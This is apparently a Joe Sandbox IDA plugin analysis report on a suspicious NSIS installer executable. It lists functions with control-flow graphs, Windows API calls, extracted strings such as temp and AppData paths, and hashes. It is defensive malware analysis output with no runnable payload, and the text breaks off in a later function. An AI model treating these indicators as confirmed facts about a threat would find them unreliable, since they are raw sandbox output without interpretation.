                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID:
                                        • API String ID: 590372296-0
                                        • Opcode ID: 6894e9f90bc875501daf67bea02dd23ffdb3990ae2fac1508e671bbf89fa6b9e
                                        • Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
                                        • Opcode Fuzzy Hash: 6894e9f90bc875501daf67bea02dd23ffdb3990ae2fac1508e671bbf89fa6b9e
                                        • Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68
                                        Function 00405A4F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159filestringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 451 405a4f-405a75 call 405d0d 454 405a77-405a89 DeleteFileA 451->454 455 405a8e-405a95 451->455 456 405c18-405c1c 454->456 457 405a97-405a99 455->457 458 405aa8-405ab8 call 40628d 455->458 459 405bc6-405bcb 457->459 460 405a9f-405aa2 457->460 466 405ac7-405ac8 call 405c66 458->466 467 405aba-405ac5 lstrcatA 458->467 459->456 462 405bcd-405bd0 459->462 460->458 460->459 464 405bd2-405bd8 462->464 465 405bda-405be2 call 406620 462->465 464->456 465->456 475 405be4-405bf8 call 405c1f call 405a07 465->475 469 405acd-405ad0 466->469 467->469 471 405ad2-405ad9 469->471 472 405adb-405ae1 lstrcatA 469->472 471->472 474 405ae6-405b04 lstrlenA FindFirstFileA 471->474 472->474 476 405b0a-405b21 call 405c4a 474->476 477 405bbc-405bc0 474->477 490 405c10-405c13 call 4053d1 475->490 491 405bfa-405bfd 475->491 484 405b23-405b27 476->484 485 405b2c-405b2f 476->485 477->459 479 405bc2 477->479 479->459 484->485 487 405b29 484->487 488 405b31-405b36 485->488 489 405b42-405b50 call 40628d 485->489 487->485 493 405b38-405b3a 488->493 494 405b9b-405bad FindNextFileA 488->494 502 405b52-405b5a 489->502 503 405b67-405b72 call 405a07 489->503 490->456 491->464 496 405bff-405c0e call 4053d1 call 406066 491->496 493->489 499 405b3c-405b40 493->499 494->476 497 405bb3-405bb6 FindClose 494->497 496->456 497->477 499->489 499->494 502->494 504 405b5c-405b65 call 405a4f 502->504 511 405b93-405b96 call 4053d1 503->511 512 405b74-405b77 503->512 504->494 511->494 513 405b79-405b89 call 4053d1 call 406066 512->513 514 405b8b-405b91 512->514 513->494 514->494
                                        APIs
                                        • DeleteFileA.KERNELBASE(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405A78
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb535E.tmp,\*.*,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405AC0
                                        • lstrcatA.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405AE1
                                        • lstrlenA.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405AE7
                                        • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsb535E.tmp,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405AF8
                                        • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
                                        • FindClose.KERNELBASE(00000000), ref: 00405BB6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsb535E.tmp$\*.*
                                        • API String ID: 2035342205-3955254049
                                        • Opcode ID: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                                        • Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
                                        • Opcode Fuzzy Hash: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                                        • Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE
                                        Function 00406620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileA.KERNELBASE(74DF3410,0042BCD8,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,00405D50,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 0040662B
                                        • FindClose.KERNELBASE(00000000), ref: 00406637
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsb535E.tmp, xrefs: 00406620
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsb535E.tmp
                                        • API String ID: 2295610775-3133259053
                                        • Opcode ID: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                                        • Instruction ID: 21071efbed15a2f64541de492f8ee2fd881da0b051754d52d90be6cd238fbd17
                                        • Opcode Fuzzy Hash: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                                        • Instruction Fuzzy Hash: 08D012355490205BC64017396F0C85BBA599F163717118E37F8A6F12E0CB758C7296DC
                                        Function 00403E33 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 152 403e33-403e45 153 403e4b-403e51 152->153 154 403fac-403fbb 152->154 153->154 155 403e57-403e60 153->155 156 40400a-40401f 154->156 157 403fbd-404005 GetDlgItem * 2 call 40432d SetClassLongA call 40140b 154->157 158 403e62-403e6f SetWindowPos 155->158 159 403e75-403e7c 155->159 161 404021-404024 156->161 162 40405f-404064 call 404379 156->162 157->156 158->159 164 403ec0-403ec6 159->164 165 403e7e-403e98 ShowWindow 159->165 167 404026-404031 call 401389 161->167 168 404057-404059 161->168 170 404069-404084 162->170 173 403ec8-403eda DestroyWindow 164->173 174 403edf-403ee2 164->174 171 403f99-403fa7 call 404394 165->171 172 403e9e-403eb1 GetWindowLongA 165->172 167->168 187 404033-404052 SendMessageA 167->187 168->162 169 4042fa 168->169 181 4042fc-404303 169->181 178 404086-404088 call 40140b 170->178 179 40408d-404093 170->179 171->181 172->171 180 403eb7-403eba ShowWindow 172->180 182 4042d7-4042dd 173->182 184 403ee4-403ef0 SetWindowLongA 174->184 185 403ef5-403efb 174->185 178->179 191 4042b8-4042d1 DestroyWindow EndDialog 179->191 192 404099-4040a4 179->192 180->164 182->169 190 4042df-4042e5 182->190 184->181 185->171 193 403f01-403f10 GetDlgItem 185->193 187->181 190->169 194 4042e7-4042f0 ShowWindow 190->194 191->182 192->191 195 4040aa-4040f7 call 406320 call 40432d * 3 GetDlgItem 192->195 196 403f12-403f29 SendMessageA IsWindowEnabled 193->196 197 403f2f-403f32 193->197 194->169 224 404101-40413d ShowWindow KiUserCallbackDispatcher call 40434f EnableWindow 195->224 225 4040f9-4040fe 195->225 196->169 196->197 198 403f34-403f35 197->198 199 403f37-403f3a 197->199 201 403f65-403f6a call 404306 198->201 202 403f48-403f4d 199->202 203 403f3c-403f42 199->203 201->171 205 403f83-403f93 SendMessageA 202->205 207 403f4f-403f55 202->207 203->205 206 403f44-403f46 203->206 205->171 206->201 210 403f57-403f5d call 40140b 207->210 211 403f6c-403f75 call 40140b 207->211 222 403f63 210->222 211->171 220 403f77-403f81 211->220 220->222 222->201 228 404142 224->228 229 40413f-404140 224->229 225->224 230 404144-404172 GetSystemMenu EnableMenuItem SendMessageA 228->230 229->230 231 404174-404185 SendMessageA 230->231 232 404187 230->232 233 40418d-4041c7 call 404362 call 403e14 call 40628d lstrlenA call 406320 SetWindowTextA call 401389 231->233 232->233 233->170 244 4041cd-4041cf 233->244 244->170 245 4041d5-4041d9 244->245 246 4041f8-40420c DestroyWindow 245->246 247 4041db-4041e1 245->247 246->182 249 404212-40423f CreateDialogParamA 246->249 247->169 248 4041e7-4041ed 247->248 248->170 250 4041f3 248->250 249->182 251 404245-40429c call 40432d GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 249->251 250->169 251->169 256 40429e-4042b1 ShowWindow call 404379 251->256 258 4042b6 256->258 258->182
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E6F
                                        • ShowWindow.USER32(?), ref: 00403E8F
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00403EA1
                                        • ShowWindow.USER32(?,00000004), ref: 00403EBA
                                        • DestroyWindow.USER32 ref: 00403ECE
                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EE7
                                        • GetDlgItem.USER32(?,?), ref: 00403F06
                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403F1A
                                        • IsWindowEnabled.USER32(00000000), ref: 00403F21
                                        • GetDlgItem.USER32(?,00000001), ref: 00403FCC
                                        • GetDlgItem.USER32(?,00000002), ref: 00403FD6
                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403FF0
                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00404041
                                        • GetDlgItem.USER32(?,00000003), ref: 004040E7
                                        • ShowWindow.USER32(00000000,?), ref: 00404108
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040411A
                                        • EnableWindow.USER32(?,?), ref: 00404135
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414B
                                        • EnableMenuItem.USER32(00000000), ref: 00404152
                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040416A
                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040417D
                                        • lstrlenA.KERNEL32(0042A488,?,0042A488,00000000), ref: 004041A7
                                        • SetWindowTextA.USER32(?,0042A488), ref: 004041B6
                                        • ShowWindow.USER32(?,0000000A), ref: 004042EA
                                        Strings
                                        • Click Next to continue., xrefs: 004040B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID: Click Next to continue.
                                        • API String ID: 121052019-3768601390
                                        • Opcode ID: 6d7623d9db7cd4b2b8523d1bb3db3e3d74f302aff2fe3ff677a931fada95a4e0
                                        • Instruction ID: 7c61018aff81ba8050a36ffdf8d01ac8e149416bf37329b2a87c27abd1a4edd3
                                        • Opcode Fuzzy Hash: 6d7623d9db7cd4b2b8523d1bb3db3e3d74f302aff2fe3ff677a931fada95a4e0
                                        • Instruction Fuzzy Hash: 60C1F4B1600205ABD7206F61EE49E2B3BBCEB85749F51053EF681B11F1CB799842DB2D
                                        Function 00403A96 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 310 403a96-403aae call 4066b5 313 403ab0-403ac0 call 4061eb 310->313 314 403ac2-403af3 call 406174 310->314 321 403b16-403b3f call 403d5b call 405d0d 313->321 319 403af5-403b06 call 406174 314->319 320 403b0b-403b11 lstrcatA 314->320 319->320 320->321 328 403b45-403b4a 321->328 329 403bc6-403bce call 405d0d 321->329 328->329 330 403b4c-403b70 call 406174 328->330 335 403bd0-403bd7 call 406320 329->335 336 403bdc-403c01 LoadImageA 329->336 330->329 337 403b72-403b74 330->337 335->336 339 403c82-403c8a call 40140b 336->339 340 403c03-403c33 RegisterClassA 336->340 342 403b85-403b91 lstrlenA 337->342 343 403b76-403b83 call 405c4a 337->343 351 403c94-403c9f call 403d5b 339->351 352 403c8c-403c8f 339->352 344 403d51 340->344 345 403c39-403c7d SystemParametersInfoA CreateWindowExA 340->345 349 403b93-403ba1 lstrcmpiA 342->349 350 403bb9-403bc1 call 405c1f call 40628d 342->350 343->342 348 403d53-403d5a 344->348 345->339 349->350 355 403ba3-403bad GetFileAttributesA 349->355 350->329 363 403ca5-403cbf ShowWindow call 406647 351->363 364 403d28-403d29 call 4054a3 351->364 352->348 356 403bb3-403bb4 call 405c66 355->356 357 403baf-403bb1 355->357 356->350 357->350 357->356 371 403cc1-403cc6 call 406647 363->371 372 403ccb-403cdd GetClassInfoA 363->372 367 403d2e-403d30 364->367 369 403d32-403d38 367->369 370 403d4a-403d4c call 40140b 367->370 369->352 373 403d3e-403d45 call 40140b 369->373 370->344 371->372 376 403cf5-403d18 DialogBoxParamA call 40140b 372->376 377 403cdf-403cef GetClassInfoA RegisterClassA 372->377 373->352 381 403d1d-403d26 call 4039e6 376->381 377->376 381->348
                                        APIs
                                          • Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                          • Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                        • lstrcatA.KERNEL32(1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",0000000A,0000000C), ref: 00403B11
                                        • lstrlenA.KERNEL32(0042DFC0,?,?,?,0042DFC0,00000000,C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate,1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,74DF3410), ref: 00403B86
                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
                                        • GetFileAttributesA.KERNEL32(0042DFC0,?,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",0000000A,0000000C), ref: 00403BA4
                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate), ref: 00403BED
                                          • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                        • RegisterClassA.USER32(0042E7C0), ref: 00403C2A
                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C42
                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
                                        • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",0000000A,0000000C), ref: 00403CAD
                                        • GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
                                        • GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
                                        • RegisterClassA.USER32(0042E7C0), ref: 00403CEF
                                        • DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                        • API String ID: 1975747703-3756021822
                                        • Opcode ID: 9de4ba4982955c39501ca71976a9485f8cd52ade1bb06ecee508862ffe36d889
                                        • Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
                                        • Opcode Fuzzy Hash: 9de4ba4982955c39501ca71976a9485f8cd52ade1bb06ecee508862ffe36d889
                                        • Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D
                                        Function 00402F31 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 181memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 384 402f31-402f7f GetTickCount GetModuleFileNameA call 405e20 387 402f81-402f86 384->387 388 402f8b-402fb9 call 40628d call 405c66 call 40628d GetFileSize 384->388 389 403161-403165 387->389 396 4030a4-4030b2 call 402ecd 388->396 397 402fbf 388->397 403 4030b4-4030b7 396->403 404 403107-40310c 396->404 399 402fc4-402fdb 397->399 401 402fdd 399->401 402 402fdf-402fe8 call 40337a 399->402 401->402 411 40310e-403116 call 402ecd 402->411 412 402fee-402ff5 402->412 406 4030b9-4030d1 call 403390 call 40337a 403->406 407 4030db-403105 GlobalAlloc call 403390 call 403168 403->407 404->389 406->404 434 4030d3-4030d9 406->434 407->404 433 403118-403129 407->433 411->404 416 403071-403075 412->416 417 402ff7-40300b call 405ddb 412->417 422 403077-40307e call 402ecd 416->422 423 40307f-403085 416->423 417->423 431 40300d-403014 417->431 422->423 424 403094-40309c 423->424 425 403087-403091 call 40676c 423->425 424->399 432 4030a2 424->432 425->424 431->423 437 403016-40301d 431->437 432->396 438 403131-403136 433->438 439 40312b 433->439 434->404 434->407 437->423 440 40301f-403026 437->440 441 403137-40313d 438->441 439->438 440->423 442 403028-40302f 440->442 441->441 443 40313f-40315a SetFilePointer call 405ddb 441->443 442->423 444 403031-403051 442->444 447 40315f 443->447 444->404 446 403057-40305b 444->446 448 403063-40306b 446->448 449 40305d-403061 446->449 447->389 448->423 450 40306d-40306f 448->450 449->432 449->448 450->423
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402F42
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,00000400,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F5E
                                          • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                          • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                        • GetFileSize.KERNEL32(00000000,00000000,IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,80000000,00000003,?,?,00403722,?,?,00000008), ref: 00402FAA
                                        • GlobalAlloc.KERNELBASE(00000040,00000008,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 004030E0
                                        Strings
                                        • Error launching installer, xrefs: 00402F81
                                        • 8TA, xrefs: 00402FBF
                                        • "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe", xrefs: 00402F37
                                        • IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, xrefs: 00402F9E
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402F38
                                        • Null, xrefs: 00403028
                                        • C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, xrefs: 00402F48, 00402F57, 00402F6B, 00402F8B
                                        • Inst, xrefs: 00403016
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403107
                                        • soft, xrefs: 0040301F
                                        • C:\Users\user\Desktop, xrefs: 00402F8C, 00402F91, 00402F97
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"$8TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe$Error launching installer$IMG635673567357735773573757875883587935775753Bjlkeloftet.exe$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                        • API String ID: 2803837635-4264440587
                                        • Opcode ID: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                        • Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
                                        • Opcode Fuzzy Hash: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                        • Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D
                                        Function 00406320 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 208stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 520 406320-40632b 521 40632d-40633c 520->521 522 40633e-406353 520->522 521->522 523 406564-406568 522->523 524 406359-406364 522->524 525 406376-406380 523->525 526 40656e-406578 523->526 524->523 527 40636a-406371 524->527 525->526 530 406386-40638d 525->530 528 406583-406584 526->528 529 40657a-40657e call 40628d 526->529 527->523 529->528 532 406393-4063c9 530->532 533 406557 530->533 536 406501-406504 532->536 537 4063cf-4063d9 532->537 534 406561-406563 533->534 535 406559-40655f 533->535 534->523 535->523 538 406534-406537 536->538 539 406506-406509 536->539 540 4063f6 537->540 541 4063db-4063e4 537->541 546 406545-406555 lstrlenA 538->546 547 406539-406540 call 406320 538->547 544 406519-406525 call 40628d 539->544 545 40650b-406517 call 4061eb 539->545 543 4063fd-406405 540->543 541->540 542 4063e6-4063e9 541->542 542->540 548 4063eb-4063ee 542->548 549 406407 543->549 550 40640e-406410 543->550 558 40652a-406530 544->558 545->558 546->523 547->546 548->540 554 4063f0-4063f4 548->554 549->550 555 406412-406435 call 406174 550->555 556 406447-40644a 550->556 554->543 570 4064e8-4064ec 555->570 571 40643b-406442 call 406320 555->571 561 40644c-406458 GetSystemDirectoryA 556->561 562 40645d-406460 556->562 558->546 560 406532 558->560 566 4064f9-4064ff call 406587 560->566 567 4064e3-4064e6 561->567 563 406471-406474 562->563 564 406462-40646e GetWindowsDirectoryA 562->564 563->567 568 406476-406494 563->568 564->563 566->546 567->566 567->570 573 406496-406499 568->573 574 4064ab-4064c3 call 4066b5 568->574 570->566 572 4064ee-4064f4 lstrcatA 570->572 571->567 572->566 573->574 577 40649b-40649f 573->577 583 4064c5-4064d8 SHGetPathFromIDListA CoTaskMemFree 574->583 584 4064da-4064e1 574->584 581 4064a7-4064a9 577->581 581->567 581->574 583->567 583->584 584->567 584->568
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(0042DFC0,00000400), ref: 00406452
